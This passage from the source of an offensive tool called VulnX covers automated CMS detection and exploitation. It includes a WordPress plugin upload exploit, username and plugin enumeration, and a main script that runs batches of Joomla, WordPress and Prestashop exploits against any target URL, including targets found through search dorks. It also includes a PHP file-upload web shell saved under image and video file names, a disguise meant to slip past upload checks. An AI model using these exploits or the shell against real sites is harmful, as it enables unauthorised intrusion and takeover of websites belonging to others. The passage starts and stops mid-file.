| vulnresults.add('[SUCCESS] levoslideshow -- Shell:' + dump_data) 428 | else: 429 | print (' %s levoslideshow %s' %(que , failexploit)) 430 | vulnresults.add('[FAILED] levoslideshow') 431 | 432 | #responsive_thumbnail_slider : exploit data = 27-07-2018 433 | def wp_thumbnailSlider(url,headers): 434 | endpoint = url + "wp-admin/admin.php?page=responsive_thumbnail_slider_image_management" 435 | with open('shell/Vulnx.gif', 'rb') as img: 436 | name_img= os.path.basename('shell/Vulnx.gif') 437 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 438 | upload_file = Session.post(url,files=files) 439 | fname = re.findall(re.compile(r'/slider\/(.*\.gif)/'),upload_file) 440 | if fname: 441 | dump_data = url + "wp-content/uploads/wp-responsive-images-thumbnail-slider/"+fname 442 | print (' %s thumbnail-slider %s %s' %(que,vulnexploit,dump_data)) 443 | else: 444 | print (' %s thumbnail-slider %s' %(que , failexploit)) -------------------------------------------------------------------------------- /modules/wpGrabber.py: -------------------------------------------------------------------------------- 1 | """ WordPress Information Gathering """ 2 | import re 3 | import requests 4 | from common.colors import B,W,G,good,bad 5 | 6 | #searching for the wordpress version 7 | def wp_version(url,headers,grabinfo): 8 | ep = url 9 | getversion = requests.get(ep,headers).text 10 | #searching version content from the http response. \d{:digit} version form 0.0.0 11 | matches = re.search(re.compile(r'content=\"WordPress (\d{0,9}.\d{0,9}.\d{0,9})?\"'),getversion) 12 | if matches: 13 | version = matches.group(1) 14 | return print (' %s Version : %s' %(good,version)) 15 | grabinfo.add('Version - '+ version) 16 | #searching for the wordpress themes 17 | def wp_themes(url,headers,grabinfo): 18 | ep = url 19 | themes_array = [] 20 | getthemes = requests.get(ep,headers).text 21 | matches = re.findall(re.compile(r'themes/(\w+)?/'),getthemes) 22 | #loop for matching themes.) 
23 | if len(matches) > 0: 24 | for theme in matches: 25 | if theme not in themes_array: 26 | themes_array.append(theme) 27 | for i in range(len(themes_array)): 28 | print (' %s Themes : %s ' %(good , themes_array[i])) 29 | #searching for the wordpress user 30 | def wp_user(url,headers,grabinfo): 31 | ep = url + '/?author=1' 32 | getuser = requests.get(ep,headers).text 33 | matches = re.search(re.compile(r'author/(\w+)?/'),getuser) 34 | if matches: 35 | user = matches.group(1) 36 | return print (' %s User : %s' %(good,user)) 37 | grabinfo.add('user - '+ user) 38 | 39 | #searching for the wordpress plugins 40 | def wp_plugin(url,headers,grabinfo): 41 | plugins_array = [] 42 | ep = url 43 | getplugin = requests.get(ep,headers).text 44 | matches = re.findall(re.compile(r'wp-content/plugins/(\w+)?/'),getplugin) 45 | if len(matches) > 0: 46 | for plugin in matches: 47 | if plugin not in plugins_array: 48 | plugins_array.append(plugin) 49 | for i in range(len(plugins_array)): 50 | print (' %s Plugins : %s ' %(good , plugins_array[i])) 51 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | bs4 3 | -------------------------------------------------------------------------------- /shell/VulnX.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LulzSecToolkit/vulnx/d5b6fba86c0d316622ad1f12d11884bd85a7a7cb/shell/VulnX.gif -------------------------------------------------------------------------------- /shell/VulnX.html: -------------------------------------------------------------------------------- 1 | VulnX Uploading 2 | -------------------------------------------------------------------------------- /shell/VulnX.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Uname:".php_uname()."
"; 11 | echo ''; 12 | if(isset($_POST['Submit'])){ 13 | $filedir = ""; 14 | $maxfile = '2000000'; 15 | $mode = '0644'; 16 | $userfile_name = $_FILES['image']['name']; 17 | $userfile_tmp = $_FILES['image']['tmp_name']; 18 | if(isset($_FILES['image']['name'])) { 19 | $qx = $filedir.$userfile_name; 20 | @move_uploaded_file($userfile_tmp, $qx); 21 | @chmod ($qx, octdec($mode)); 22 | echo"
Uploaded Success ==> $userfile_name
"; 23 | } 24 | } 25 | else{ 26 | echo'
'; 27 | } 28 | echo '
'; 29 | 30 | } 31 | ?> -------------------------------------------------------------------------------- /shell/VulnX.php.mp4: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Uname:".php_uname()."
"; 11 | echo ''; 12 | if(isset($_POST['Submit'])){ 13 | $filedir = ""; 14 | $maxfile = '2000000'; 15 | $mode = '0644'; 16 | $userfile_name = $_FILES['image']['name']; 17 | $userfile_tmp = $_FILES['image']['tmp_name']; 18 | if(isset($_FILES['image']['name'])) { 19 | $qx = $filedir.$userfile_name; 20 | @move_uploaded_file($userfile_tmp, $qx); 21 | @chmod ($qx, octdec($mode)); 22 | echo"
Uploaded Success ==> $userfile_name
"; 23 | } 24 | } 25 | else{ 26 | echo'

'; 27 | } 28 | echo '
'; 29 | 30 | } 31 | ?> -------------------------------------------------------------------------------- /shell/VulnX.php.png: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Uname:".php_uname()."
"; 11 | echo ''; 12 | if(isset($_POST['Submit'])){ 13 | $filedir = ""; 14 | $maxfile = '2000000'; 15 | $mode = '0644'; 16 | $userfile_name = $_FILES['image']['name']; 17 | $userfile_tmp = $_FILES['image']['tmp_name']; 18 | if(isset($_FILES['image']['name'])) { 19 | $qx = $filedir.$userfile_name; 20 | @move_uploaded_file($userfile_tmp, $qx); 21 | @chmod ($qx, octdec($mode)); 22 | echo"
Uploaded Success ==> $userfile_name
"; 23 | } 24 | } 25 | else{ 26 | echo'

'; 27 | } 28 | echo '
'; 29 | 30 | } 31 | ?> -------------------------------------------------------------------------------- /shell/VulnX.txt: -------------------------------------------------------------------------------- 1 | Tig 2 | -------------------------------------------------------------------------------- /shell/VulnX.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LulzSecToolkit/vulnx/d5b6fba86c0d316622ad1f12d11884bd85a7a7cb/shell/VulnX.zip -------------------------------------------------------------------------------- /update.sh: -------------------------------------------------------------------------------- 1 | red = "\e[0;31m" 2 | green = "\e[0;32m" 3 | off = "\e[0m" 4 | function banner(){ 5 | echo -e "===== VULNX INSTALL =====" 6 | } 7 | function termuxOS() { 8 | echo -e "$red [$green+$red]$Cleaning Up Old Directories ..."; 9 | rm -r "/data/data/com.termux/files/usr/share/vulnx" 10 | echo -e "$red [$green+$red]$off Installing ..."; 11 | git clone https://github.com/anouarbensaad/vulnx "/data/data/com.termux/files/usr/share/vulnx"; 12 | rm -r "/data/data/com.termux/files/usr/share/vulnx/config" 13 | if [[ -d "/data/data/com.termux/files/usr/share/vulnx" ]]; then 14 | echo -e "$red [$green+$red]$off Tool Successfully Updated And Will Start In 5s!"; 15 | echo -e "$red [$green+$red]$off You can execute tool by typing vulnx" 16 | sleep 5; 17 | vulnx 18 | else 19 | echo -e "$red [$green✘$red]$off Tool Cannot Be Installed On Your System! 
Use It As Portable !"; 20 | exit 21 | fi 22 | } 23 | 24 | function debianOS() { 25 | echo -e "$red [$green+$red]$off Cleaning Up Old Directories ..."; 26 | sudo rm -r "/usr/share/vulnx" 27 | echo -e "$red [$green+$red]$off Installing ..."; 28 | sudo git clone https://github.com/anouarbensaad/vulnx "/usr/share/vulnx"; 29 | sudo rm -r "/usr/share/vulnx/config" 30 | if [[ -d "/usr/share/vulnx" ]]; then 31 | echo -e "$red [$green+$red]$off Tool Successfully Updated And Will Start In 5s!"; 32 | echo -e "$red [$green+$red]$off You can execute tool by typing vulnx"; 33 | sleep 5; 34 | vulnx 35 | else 36 | echo -e "$red [$green✘$red]$off Tool Cannot Be Installed On Your System! Use It As Portable !"; 37 | exit 38 | fi 39 | } 40 | if [[ -d "/data/data/com.termux/files/usr/" ]]; then 41 | banner 42 | echo -e "$red [$green+$red]$off vulnx Will Be Installed In Your System"; 43 | termuxOS 44 | elif [ -d "/usr/bin/" ];then 45 | banner 46 | echo -e "$red [$green+$red]$off vulnx Will Be Installed In Your System"; 47 | debianOS 48 | fi 49 | -------------------------------------------------------------------------------- /vulnx.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | The vulnx main part. 
5 | Author: anouarbensaad 6 | Desc : CMS-Detector and Vulnerability Scanner & exploiter 7 | Copyright (c) 8 | See the file 'LICENSE' for copying permission 9 | """ 10 | 11 | from __future__ import print_function 12 | 13 | import sys 14 | import argparse 15 | import re 16 | import os 17 | import socket 18 | import common 19 | import warnings 20 | import signal 21 | import requests 22 | from common.threading import threads 23 | 24 | warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning) 25 | warnings.filterwarnings(action="ignore", category=DeprecationWarning) 26 | 27 | from common.colors import red, green, bg, G, R, W, Y, G , good , bad , run , info , end , que ,bannerblue2 28 | from common.banner import banner 29 | from common.uriParser import parsing_url as hostd 30 | from common.requestUp import random_UserAgent 31 | from common.output_wr import writelogs as outlogs 32 | 33 | ##### MODULES 34 | 35 | from modules.portChecker import portscan 36 | from modules.wpGrabber import (wp_version,wp_plugin,wp_themes,wp_user) 37 | from modules.jooGrabber import (joo_version,joo_user,joo_template) 38 | from modules.dnsLookup import dnsdumper , domain_info 39 | from modules.wpExploits import( wp_wysija, 40 | wp_blaze, 41 | wp_catpro, 42 | wp_cherry, 43 | wp_dm, 44 | wp_fromcraft, 45 | wp_jobmanager, 46 | wp_showbiz, 47 | wp_synoptic, 48 | wp_shop, 49 | wp_powerzoomer, 50 | wp_revslider, 51 | wp_adsmanager, 52 | wp_inboundiomarketing, 53 | wp_levoslideshow, 54 | wp_adblockblocker, 55 | ) 56 | from modules.jooExploits import( com_jce, 57 | com_media, 58 | # com_jdownloads, 59 | # com_jdownloadsb, 60 | com_fabrika, 61 | com_fabrikb, 62 | com_foxcontact, 63 | com_adsmanager, 64 | com_blog, 65 | com_users, 66 | comweblinks, 67 | mod_simplefileupload, 68 | com_jbcatalog, 69 | com_sexycontactform, 70 | com_rokdownloads, 71 | com_extplorer, 72 | com_jwallpapers, 73 | com_facileforms, 74 | ) 75 | from modules.prestaExploits import ( 76 | 
columnadverts, 77 | soopabanners, 78 | vtslide, 79 | simpleslideshow, 80 | productpageadverts, 81 | productpageadvertsb, 82 | jro_homepageadvertise, 83 | attributewizardpro, 84 | oneattributewizardpro, 85 | attributewizardpro_old, 86 | attributewizardpro_x, 87 | advancedslider, 88 | cartabandonmentpro, 89 | cartabandonmentpro_old, 90 | videostab, 91 | wg24themeadministration, 92 | fieldvmegamenu, 93 | wdoptionpanel, 94 | pk_flexmenu, 95 | nvn_export_orders, 96 | tdpsthemeoptionpanel, 97 | masseditproduct, 98 | 99 | ) 100 | 101 | #cleaning screen 102 | 103 | banner() 104 | 105 | def parser_error(errmsg): 106 | print("Usage: python " + sys.argv[0] + " [Options] use -h for help") 107 | print(R + "Error: " + errmsg + W) 108 | sys.exit() 109 | 110 | def parse_args(): 111 | parser = argparse.ArgumentParser(epilog='\tExample: \r\npython ' + sys.argv[0] + " -u google.com") 112 | parser.error = parser_error 113 | parser._optionals.title = "\nOPTIONS" 114 | parser.add_argument('-u', '--url', help="url target to scan") 115 | parser.add_argument('-D', '--dorks', help='search webs with dorks', dest='dorks' , type=str) 116 | parser.add_argument('-o', '--output', help='specify output directory',required=False) 117 | parser.add_argument('-t', '--timeout', help='http requests timeout', dest='timeout',type=float) 118 | parser.add_argument('-c', '--cms-info', help='search cms info[themes,plugins,user,version..]', dest='cms', choices=['user', 'themes','version','plugins','all']) 119 | parser.add_argument('--threads', help="number of threads", dest='numthread', type=float) 120 | parser.add_argument('-n', '--number-pages', help='search dorks number page limit', dest='numberpage' , type=int) 121 | parser.add_argument('-i', '--input', help='specify input file of domains to scan',dest='input_file' ,required=False) 122 | parser.add_argument('-l','--dork-list', help='list names of dorks exploits',dest='dorkslist', 123 | choices=['wordpress', 'prestashop','joomla','lokomedia','drupal','all']) 
124 | parser.add_argument('-p', '--ports', help='ports to scan', 125 | dest='scanports', type=int) 126 | #Switches 127 | parser.add_argument('-e','--exploit', help='searching vulnerability & run exploits', 128 | dest='exploit', action='store_true') 129 | parser.add_argument('--it', help='interactive mode.', 130 | dest='cli', action='store_true') 131 | parser.add_argument('-w','--web-info', help='web informations gathering', 132 | dest='webinfo', action='store_true') 133 | parser.add_argument('-d','--domain-info', help='subdomains informations gathering', 134 | dest='domaininfo', action='store_true') 135 | parser.add_argument('--dns', help='dns informations gatherings', 136 | dest='dnsdump', action='store_true') 137 | 138 | return parser.parse_args() 139 | 140 | vulnresults = set() # results of vulnerability exploits. [success or failed] 141 | grabinfo = set() # return cms_detected the version , themes , plugins , user .. 142 | subdomains = set() # return subdomains & ip. 143 | hostinfo = set() # host info 144 | #args declaration 145 | args = parse_args() 146 | #url arg 147 | url = args.url 148 | #interactive arugment 149 | cli=args.cli 150 | #run exploit 151 | exploit = args.exploit 152 | #cms gathering args 153 | cms = args.cms 154 | # web hosting info 155 | webinfo = args.webinfo 156 | # domain info 157 | domaininfo = args.domaininfo 158 | # dorks search. 
159 | dorks = args.dorks 160 | dorkslist = args.dorkslist 161 | # timeout 162 | timeout = args.timeout or 3 163 | #thread 164 | numthread = args.numthread or 1 165 | #numberpage 166 | numberpage = args.numberpage or 1 167 | #portscan 168 | scanports = args.scanports or 22 169 | #dns 170 | dnsdump = args.dnsdump 171 | #input_file 172 | input_file = args.input_file 173 | # Disable SSL related warnings 174 | warnings.filterwarnings('ignore') 175 | 176 | #method for cms detection 177 | def detect_cms(): 178 | lm = url + '/smiley/1.gif' 179 | lm_content = requests.get(lm,headers).text 180 | lm2 = url + '/rss.xml' 181 | lm2_content = requests.get(lm2,headers).text 182 | content=requests.get(url,headers).text 183 | # try: 184 | # joomla # 185 | #joomla searching content to detect. 186 | if re.search(re.compile(r'|/media/system/js/|com_content|Joomla!'), content): 187 | print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) 188 | print ('------------------------------------------------') 189 | print (' %s looking for cms' % (que)) 190 | print (' %s %sCMS :%s Joomla' % (good,W,end)) 191 | print ('------------------------------------------------') 192 | #webinfo gathering argument 193 | if webinfo: 194 | webhosting_info(hostinfo) 195 | 196 | #domain gatherinargument 197 | if domaininfo: 198 | print (' %s Starting searching for Subdomains' %(run)) 199 | domain_info(url) 200 | 201 | if cms == 'version': 202 | print (' %s CMS informations gathering' %(run)) 203 | joo_version(url,headers) 204 | print ("-----------------------------------------------") 205 | if cms == 'all': 206 | print (' %s CMS informations gathering' %(run)) 207 | joo_version(url,headers) 208 | joo_user(url,headers) 209 | joo_template(url,headers) 210 | print ("-----------------------------------------------") 211 | #port to scan 212 | if scanports: 213 | print (' %s Scanning Ports' %(run)) 214 | print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) 215 | portscan(hostd(url),scanports) 
216 | print ("-----------------------------------------------") 217 | if dnsdump: 218 | print (' %s Starting DNS dump' %(run)) 219 | dnsdumper(url) 220 | print ("-----------------------------------------------") 221 | #joomla_exploits imported from folder[./common/joomla_exploits.py] 222 | if exploit: 223 | print (' %s Check Vulnerability' %(run)) 224 | print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W)) 225 | com_jce(url,headers) 226 | com_media(url,headers) 227 | #com_jdownloads(url,headers) 228 | # com_jdownloadsb(url,headers) 229 | com_fabrika(url,headers) 230 | com_fabrikb(url,headers) 231 | com_foxcontact(url,headers) 232 | com_adsmanager(url,headers) 233 | com_blog(url,headers) 234 | com_users(url,headers) 235 | comweblinks(url,headers) 236 | mod_simplefileupload(url,headers) 237 | com_jbcatalog(url,headers) 238 | com_sexycontactform(url,headers) 239 | com_rokdownloads(url,headers) 240 | com_extplorer(url,headers) 241 | com_jwallpapers(url,headers) 242 | com_facileforms(url,headers) 243 | 244 | # Wordpress # 245 | #wordpress searching content to detect. 
246 | elif re.search(re.compile(r'wp-content|wordpress|xmlrpc.php'), content): 247 | print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) 248 | print ('------------------------------------------------') 249 | print (' %s looking for cms' % (que)) 250 | print (' %s %sCMS :%s Wordpress' % (good,W,end)) 251 | print ('------------------------------------------------') 252 | if webinfo: 253 | webhosting_info(hostinfo) 254 | if domaininfo: 255 | print (' %s Starting searching for Subdomains' %(run)) 256 | domain_info(url) 257 | #wp_grab methods info from (folder)[./common/grapwp.py] 258 | if cms == 'version': 259 | print (' %s CMS informations gathering' %(run)) 260 | wp_version(url,headers,grabinfo) 261 | print ("-----------------------------------------------") 262 | if cms == 'themes': 263 | print (' %s CMS informations gathering' %(run)) 264 | wp_themes(url,headers,grabinfo) 265 | print ("-----------------------------------------------") 266 | if cms == 'user': 267 | print (' %s CMS informations gathering' %(run)) 268 | wp_user(url,headers,grabinfo) 269 | print ("-----------------------------------------------") 270 | if cms == 'plugins': 271 | print (' %s CMS informations gathering' %(run)) 272 | wp_plugin(url,headers,grabinfo) 273 | print ("-----------------------------------------------") 274 | if cms == 'all': 275 | print (' %s CMS informations gathering' %(run)) 276 | wp_version(url,headers,grabinfo) 277 | wp_themes(url,headers,grabinfo) 278 | wp_user(url,headers,grabinfo) 279 | wp_plugin(url,headers,grabinfo) 280 | print ("-----------------------------------------------") 281 | #port to scan 282 | if scanports: 283 | print (' %s Scanning Ports' %(run)) 284 | print (""" %sPORTS %sSTATUS %sPROTO"""%(W,W,W)) 285 | portscan(hostd(url),scanports) 286 | print ("-----------------------------------------------") 287 | if dnsdump: 288 | print (' %s Starting DNS dump' %(run)) 289 | dnsdumper(url) 290 | print 
("-----------------------------------------------") 291 | # vulnx -u http://example.com -e | vulnx -u http://example --exploit 292 | if exploit: 293 | print (' %s Check Vulnerability\n' %(run)) 294 | print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W)) 295 | #wp_exploit methods from (dolder)[./common/wp_exploits.py] 296 | wp_wysija(url,headers,vulnresults) 297 | wp_blaze(url,headers,vulnresults) 298 | wp_synoptic(url,headers,vulnresults) 299 | wp_catpro(url,headers,vulnresults) 300 | wp_cherry(url,headers,vulnresults) 301 | wp_dm(url,headers,vulnresults) 302 | wp_fromcraft(url,headers,vulnresults) 303 | wp_jobmanager(url,headers,vulnresults) 304 | wp_showbiz(url,headers,vulnresults) 305 | wp_shop(url,headers,vulnresults) 306 | wp_powerzoomer(url,headers,vulnresults) 307 | wp_revslider(url,headers,vulnresults) 308 | wp_adsmanager(url,headers,vulnresults) 309 | wp_inboundiomarketing(url,headers,vulnresults) 310 | wp_adblockblocker(url,headers,vulnresults) 311 | wp_levoslideshow(url,headers,vulnresults) 312 | print ("-----------------------------------------------") 313 | 314 | # Drupal # 315 | #drupal searching content to detect. 
316 | elif re.search(re.compile(r'Drupal|drupal|sites/all|drupal.org'), content): 317 | print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) 318 | print ('------------------------------------------------') 319 | print (' %s looking for cms' % (que)) 320 | print (' %s CMS : Drupal' % (good)) 321 | print ('------------------------------------------------') 322 | if webinfo: 323 | webhosting_info(hostinfo) 324 | #domain gatherinargument 325 | if domaininfo: 326 | print (' %s Starting searching for Subdomains' %(run)) 327 | domain_info(url) 328 | if cms == 'version': 329 | print (' %s CMS informations gathering' %(run)) 330 | drupal_version() 331 | if scanports: 332 | print (' %s Scanning Ports\n' %(run)) 333 | print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) 334 | portscan(hostd(url),scanports) 335 | print ("-----------------------------------------------") 336 | if dnsdump: 337 | print (' %s Starting DNS dump ' %(run)) 338 | dnsdumper(url) 339 | print ("-----------------------------------------------") 340 | if exploit: 341 | print (' %s Check Vulnerability\n' %(run)) 342 | print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W)) 343 | 344 | # Prestashop # 345 | #prestashop searching content to detect. 
346 | elif re.search(re.compile(r'Prestashop|prestashop'), content): 347 | print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) 348 | print ('------------------------------------------------') 349 | print (' %s looking for cms' % (que)) 350 | print (' %s %sCMS :%s Prestashop' % (good,W,end)) 351 | print ('------------------------------------------------') 352 | if webinfo: 353 | webhosting_info(hostinfo) 354 | #domain gatherinargument 355 | if domaininfo: 356 | print (' %s Starting searching for Subdomains' %(run)) 357 | domain_info(url) 358 | if cms == 'version': 359 | print (' %s CMS informations gathering' %(run)) 360 | prestashop_version() 361 | if scanports: 362 | print (' %s Scanning Ports\n' %(run)) 363 | print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) 364 | portscan(hostd(url),scanports) 365 | print ("-----------------------------------------------") 366 | if dnsdump: 367 | print (' %s Starting DNS dump ' %(run)) 368 | dnsdumper(url) 369 | print ("-----------------------------------------------") 370 | if exploit: 371 | print (' %s Check Vulnerability\n' %(run)) 372 | print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W)) 373 | columnadverts(url,headers) 374 | soopabanners(url,headers) 375 | vtslide(url,headers) 376 | simpleslideshow(url,headers) 377 | productpageadverts(url,headers) 378 | productpageadvertsb(url,headers) 379 | jro_homepageadvertise(url,headers) 380 | attributewizardpro(url,headers) 381 | oneattributewizardpro(url,headers) 382 | attributewizardpro_old(url,headers) 383 | attributewizardpro_x(url,headers) 384 | advancedslider(url,headers) 385 | cartabandonmentpro(url,headers) 386 | cartabandonmentpro_old(url,headers) 387 | videostab(url,headers) 388 | wg24themeadministration(url,headers) 389 | fieldvmegamenu(url,headers) 390 | wdoptionpanel(url,headers) 391 | pk_flexmenu(url,headers) 392 | nvn_export_orders(url,headers) 393 | tdpsthemeoptionpanel(url,headers) 394 | masseditproduct(url,headers) 395 | 396 | # OpenCart # 
397 | #opencart searching content to detect. 398 | elif re.search(re.compile(r'route=product|OpenCart|route=common|catalog/view/theme'), content): 399 | print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) 400 | print ('------------------------------------------------') 401 | print (' %s looking for cms' % (que)) 402 | print (' %s CMS : OpenCart' % (good)) 403 | print ('------------------------------------------------') 404 | if webinfo: 405 | webhosting_info(hostinfo) 406 | #domain gatherinargument 407 | if domaininfo: 408 | print (' %s Starting searching for Subdomains' %(run)) 409 | domain_info(url) 410 | if cms == 'version': 411 | print (' %s CMS informations gathering' %(run)) 412 | if scanports: 413 | print (' %s Scanning Ports\n' %(run)) 414 | print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) 415 | portscan(hostd(url),scanports) 416 | print ("-----------------------------------------------") 417 | if dnsdump: 418 | print (' %s Starting DNS dump ' %(run)) 419 | dnsdumper(url) 420 | print ("-----------------------------------------------") 421 | if exploit: 422 | print (' %s Check Vulnerability\n' %(run)) 423 | print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W)) 424 | 425 | # Magento # 426 | #magento searching content to detect. 
427 | elif re.search(re.compile(r'Log into Magento Admin Page|name=\"dummy\" id=\"dummy\"|Magento'), content): 428 | print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) 429 | print ('------------------------------------------------') 430 | print (' %s looking for cms' % (que)) 431 | print (' %s CMS : Magento' % (good)) 432 | print ('------------------------------------------------') 433 | if webinfo: 434 | webhosting_info(hostinfo) 435 | #domain gatherinargument 436 | if domaininfo: 437 | print (' %s Starting searching for Subdomains' %(run)) 438 | domain_info(url) 439 | if cms == 'version': 440 | print (' %s CMS informations gathering' %(run)) 441 | if scanports: 442 | print (' %s Scanning Ports\n' %(run)) 443 | print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) 444 | portscan(hostd(url),scanports) 445 | print ("-----------------------------------------------") 446 | if dnsdump: 447 | print (' %s Starting DNS dump ' %(run)) 448 | dnsdumper(url) 449 | print ("-----------------------------------------------") 450 | if exploit: 451 | print (' %s Check Vulnerability' %(run)) 452 | print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W)) 453 | 454 | # Lokomedia # 455 | #lokomedia searching content to detect. 
456 | print (' %s Check Vulnerability' %(run)) 457 | elif re.search(re.compile(r'image/gif'), lm_content): 458 | print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) 459 | print ('------------------------------------------------') 460 | print (' %s looking for cms' % (que)) 461 | print (' %s CMS : Lokomedia' % (good)) 462 | print ('------------------------------------------------') 463 | if subdomains: 464 | print (' %s Starting searching for Subdomains' %(run)) 465 | domain_info(url) 466 | print ('------------------------------------------------') 467 | if scanports: 468 | print (' %s Scanning Ports\n' %(run)) 469 | print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) 470 | portscan(hostd(url),scanports) 471 | print ("-----------------------------------------------") 472 | if dnsdump: 473 | print (' %s Starting DNS dump ' %(run)) 474 | dnsdumper(url) 475 | print ("-----------------------------------------------") 476 | print (' %s Check Vulnerability' %(run)) 477 | elif re.search(re.compile(r'lokomedia'), lm2_content): 478 | print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) 479 | print ('------------------------------------------------') 480 | print (' %s looking for cms' % (que)) 481 | print (' %s CMS : Lokomedia' % (good)) 482 | print ('------------------------------------------------') 483 | if subdomains: 484 | print (' %s Starting searching for Subdomains' %(run)) 485 | domain_info(url) 486 | if scanports: 487 | print (' %s Scanning Ports\n' %(run)) 488 | print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) 489 | portscan(hostd(url),scanports) 490 | print ("-----------------------------------------------") 491 | if dnsdump: 492 | print (' %s Starting DNS dump ' %(run)) 493 | dnsdumper(url) 494 | print ("-----------------------------------------------") 495 | print (' %s Check Vulnerability' %(run)) 496 | 497 | # Unknown # 498 | #no cms detect 499 | else: 500 | print ('\n %s[%sTarget%s]%s => %s%s \n '% 
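(bannerblue2,W,bannerblue2, W, url, end))
            # NOTE(review): tail of detect_cms(); its head (and the branch these
            # prints sit in) is outside this excerpt, so the indentation here is
            # reconstructed — confirm against the full file.
            print ('------------------------------------------------')
            print (' %s looking for cms' % (que))
            print (' %s CMS : Unknown' % (bad))
            print ('------------------------------------------------')
        if webinfo:
            webhosting_info(hostinfo)
        #domain gatherinargument
        if domaininfo:
            print (' %s Starting searching for Subdomains' %(run))
            domain_info(url)
            print ("-----------------------------------------------")
        if dnsdump:
            print (' %s Starting DNS dump ' %(run))
            dnsdumper(url)
            print ("-----------------------------------------------")
    # except Exception as e:
    #     print ('%s\n\n error : %s%s' % (R,e,W))


# Seconds to wait on each outbound HTTP request. Without a timeout a
# non-responding target blocks the whole scan indefinitely.
REQUEST_TIMEOUT = 30


# drupal Version
def drupal_version():
    """Print the Drupal version string found in the target page, if any.

    Reads the module-level ``url`` and ``headers``. Fetch and parse failures
    are reported on stdout instead of raised so the rest of the scan goes on.
    """
    pattern = re.compile(r'Drupal \d{0,10}')
    try:
        # ``headers`` must be passed by keyword: requests.get's second positional
        # parameter is ``params``, so the dict was being sent as a query string
        # and no User-Agent header ever reached the target.
        response = requests.get(url, headers=headers, timeout=REQUEST_TIMEOUT).text
        matches = pattern.findall(response)
        if matches and matches[0]:
            print ('%s [+] Drupal Version : %s %s' % (G, matches[0], W))
    except Exception as error_:
        print('Handling Error : ' + str(error_))


# Prestashop Version
def prestashop_version():
    """Print the Prestashop version string found in the target page, if any.

    Reads the module-level ``url`` and ``headers``. Fetch and parse failures
    are reported on stdout instead of raised so the rest of the scan goes on.
    """
    pattern = re.compile(r'Prestashop \d{0,9}')
    try:
        response = requests.get(url, headers=headers, timeout=REQUEST_TIMEOUT).text
        # ``response`` is already the decoded body (a str); calling ``.text`` on
        # it again, as the previous version did, always raised and so a
        # Prestashop version was never reported.
        matches = pattern.findall(response)
        if matches and matches[0]:
            print ('%s [+] Prestashop Version : %s %s' % (G, matches[0], W))
    except Exception as error_:
        print('Handling Error : ' + str(error_))


# Web Hosting Information
def webhosting_info(hostinfo):
    """Print domain-age and IP geolocation details for the module-level ``url``.

    Args:
        hostinfo: accepted for call-site compatibility; not used here.

    The domain-age request is not guarded (as before); failures inside the IP
    lookup are reported on stdout as a parsing error.
    """
    import json  # local import: the file's import block is outside this excerpt

    print (' %s Web Hosting Information' % (run))
    host = hostd(url)
    urldate = "https://input.payapi.io/v1/api/fraud/domain/age/" + host
    getinfo = requests.get(urldate, headers=headers, timeout=REQUEST_TIMEOUT).text
    created = re.search(r'Date: (.+?)-(.+?)', getinfo)
    if created:
        print ( ' %s Domain Created on : %s' % (good, created.group(1)))
    try:
        ip = socket.gethostbyname(host)
        print ( ' %s CloudFlare IP : %s' % (good, ip))
        # HTTPS so the address being investigated is not disclosed to, or the
        # answer altered by, anyone on the path.
        ipinfo = "https://ipinfo.io/" + ip + "/json"
        details = json.loads(
            requests.get(ipinfo, headers=headers, timeout=REQUEST_TIMEOUT).text
        )
        # Same labels and field names the previous regexes looked for.
        # NOTE(review): ipinfo.io's documented JSON carries coordinates in
        # 'loc' and the AS number inside 'org'; 'latitude', 'longitude' and
        # 'ans' are kept only for output compatibility — confirm which fields
        # are actually wanted.
        fields = (
            ('Country', 'country'),
            ('Region', 'region'),
            ('Latitude', 'latitude'),
            ('Longitude', 'longitude'),
            ('Timezone', 'timezone'),
            ('Ans', 'ans'),
            ('Org', 'org'),
        )
        for label, key in fields:
            value = details.get(key)
            if value:
                print(' %s %s : %s' % (good, label, value))
        print ("-----------------------------------------------")
    except Exception as parsing_error:
        print(' %s Parsing error : %s' % (bad, str(parsing_error)))


# output
output_dir = args.output or 'logs'

# exist_ok avoids the check-then-create race of os.path.exists + os.mkdir.
os.makedirs(output_dir, exist_ok=True)

data = [vulnresults, grabinfo, subdomains, hostinfo]
data_names = ['vulnresults', 'grabinfo', 'subdomains', 'hostinfo']
outlogs(data, data_names, output_dir)

# Materialised copies of the result sets; kept for compatibility, nothing in
# this excerpt reads it.
data = {
    'vulnresults': list(vulnresults),
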